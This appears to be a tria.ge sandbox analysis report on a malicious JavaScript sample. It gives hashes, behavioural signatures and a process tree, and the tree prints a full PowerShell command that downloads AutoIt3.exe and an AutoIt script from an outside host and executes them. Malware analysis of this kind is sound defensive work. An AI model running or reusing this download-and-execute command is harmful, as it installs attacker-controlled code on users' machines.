Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
25/10/2023, 17:27
Static task
static1
Behavioral task
behavioral1
Sample
1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.js
Resource
win7-20231020-en
4 signatures
150 seconds
General
-
Target
1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.js
-
Size
135KB
-
MD5
a509ba7ed20b627448a220c2924d3a07
-
SHA1
4b2cc002217a95e42fa0d7b49ef5688ca186e74f
-
SHA256
21d51086d7aa99d7d96a5e9aa196da720fcf526fbe2421972e1c3555bb84fc8c
-
SHA512
9bfb1c14168d4ed73a6bd01eee819939676c412c0e3729d455b3f63df1eefa7607ddc5074ac69123b17660d2264343dd8afed089f123b6cf41c742bd681ec544
-
SSDEEP
1536:BZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/0m:0T9U7hgaX6eerjqlI2IO6MzqfJAl
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2112 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2200 wrote to memory of 2112 2200 wscript.exe 28 PID 2200 wrote to memory of 2112 2200 wscript.exe 28 PID 2200 wrote to memory of 2112 2200 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.js1⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/temp' -Type Directory -Force;cd 'C:/temp'; Invoke-WebRequest -Uri 'http://sftp.bitepieces.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.bitepieces.com:443/msirzskfhle' -OutFile 'rzskfhle.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'rzskfhle.au3'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
-